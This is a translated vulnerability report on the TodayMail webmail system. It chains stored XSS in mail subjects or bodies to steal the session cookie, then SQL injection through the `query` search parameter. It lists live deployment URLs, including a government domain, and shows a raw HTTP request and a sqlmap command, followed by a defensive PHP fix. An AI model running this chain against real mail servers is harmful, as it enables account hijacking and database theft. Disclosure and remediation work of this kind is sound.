时代互联 (Today Internet) TodayMail system: blind XSS and SQL injection (reproduced on the official demo)
Note: the injection requires login.
The mail system run by 时代互联 (official site: now.cn) has a universal SQL injection flaw. It is deployed on a large number of sites, including government sites; the install base is enormous:
http://mail.wfq.gov.cn/webmail/login.php?Cmd=login
http://mail.totalfitness.com.cn/webmail/login.php?Cmd=login
http://mail.qtc.org.cn/webmail/login.php?Cmd=login
http://mail.yphb.com.cn/webmail/login.php?Cmd=login
http://mail.power-ring.cn/webmail/login.php?Cmd=login
-----------
What I am publishing this time is a combo attack leading to SQL injection. After repeated testing, this combination is the only way to reach the injection. The injection occurs in the keyword search at the `query` parameter, which is not filtered properly, but that function is only accessible after login. Login is verified through the PHPSESSID, which cannot be forged. The mailbox and password used to log in are set by the administrator themselves. And the password strength? Practically impossible to crack. I took one mailbox administrator account and had a look at the settings:
(Passwords must be 6 or more characters and may consist only of letters plus digits, letters plus "_", "-", ".", or digits plus "_", "-", ".")
The password policy is strong, so fuzzing is nearly impossible, even though the login CAPTCHA is weak. Let's look at the other usual breakthrough point: forgot password.
As the screenshot shows, unfortunately that function is locked. There is no other way around the login, so only one thing is left ---------- yes, that's right:
XSS/CSRF
With the user's cookie (in fact only the PHPSESSID is needed) we can log into that mailbox and then exploit the SQL flaw for injection. Testing shows that both the mail subject and the mail body are vulnerable to stored XSS. Test PoC:
As the title says, reproduced on the official demo!
==========================================================================
mail.now.cn
The login page 302-redirects to a CDN host:
http://cdn621.todayisp.net
So let's test there. I won't go into how the mailbox addresses were collected; they can be found on the official site and in the HTML markup. Now write a mail and insert into the subject or body:
Before long, results came in:
The cookie was captured successfully, which means we have the PHPSESSID. How to use it?
# Combo: SQL injection (note: after login, several unfiltered spots are injectable). Put the user cookie obtained via blind XSS into the following request:
GET /webmail/main/list_search.php?query=123*&=%E6%90%9C%E7%B4%A2%E9%82%AE%E4%BB%B6 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://cdn621.todayisp.net/webmail/main/default.php
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: cdn621.todayisp.net
Proxy-Connection: Keep-Alive
Cookie: CFG_LANGUAGE=gb; PHPSESSID=*********; LoginDomain=******; cookie_name=*********
Save this as 1.txt (`123*` marks the unfiltered injection point), then run sqlmap:
sqlmap -r c:/1.txt --dbs
The injection result comes back directly.
All databases (sqlmap reported 109 in total):
available databases [109]:
Fix:
Filter (sanitize) the input.
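A hardened sketch of the three points this report chains together (the session cookie, rendering of mail subject/body, and the `query` search parameter), written as an added example in PHP; it is not TodayMail's own code, and the table, column, session-key and DSN placeholder names are assumptions:

```php
<?php
// Added example, not TodayMail's own code. Table/column names, the session
// key 'uid' and the DB_* placeholders are hypothetical.

// 1. Session cookie: HttpOnly keeps PHPSESSID out of reach of script injected
//    through a stored XSS, so a stolen-cookie login like the one above fails.
function startHardenedSession(): void {
    session_set_cookie_params([   // array form needs PHP 7.3+
        'httponly' => true,
        'secure'   => true,   // send only over HTTPS
        'samesite' => 'Lax',  // blunts cross-site request forgery
    ]);
    session_start();
}

// 2. Stored XSS: subject and body come from the sender. Encode on output.
function renderMailField(string $value): string {
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// 3. SQL injection in the search keyword (the `query` parameter). A prepared
//    statement binds the keyword as data, so quotes or comment sequences in
//    it cannot alter the statement. LIKE wildcards are escaped as well so a
//    user cannot turn the keyword into a match-everything pattern.
function searchMail(PDO $db, int $userId, string $keyword): array {
    $pattern = '%' . addcslashes($keyword, '%_\\') . '%';
    $stmt = $db->prepare(
        'SELECT id, subject, sender FROM mails
          WHERE owner_id = :uid
            AND (subject LIKE :pat1 OR body LIKE :pat2)
          ORDER BY id DESC LIMIT 50'
    );
    // Two markers for one value: native MySQL prepares do not allow reusing
    // a single named marker twice.
    $stmt->execute([':uid' => $userId, ':pat1' => $pattern, ':pat2' => $pattern]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Handler sketch standing in for list_search.php.
startHardenedSession();
if (!isset($_SESSION['uid'])) { http_response_code(403); exit; }
$db = new PDO('mysql:host=DB_HOST;dbname=DB_NAME;charset=utf8mb4', 'DB_USER', 'DB_PASS', [
    PDO::ATTR_EMULATE_PREPARES => false,          // real server-side prepares
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
]);
$keyword = (string)($_GET['query'] ?? '');
foreach (searchMail($db, (int)$_SESSION['uid'], $keyword) as $row) {
    echo '<li>', renderMailField($row['subject']), '</li>';
}
```

With these controls in place, the captured-cookie step fails (the cookie is not exposed to script) and the `123*` payload is matched literally as text instead of being interpreted as SQL.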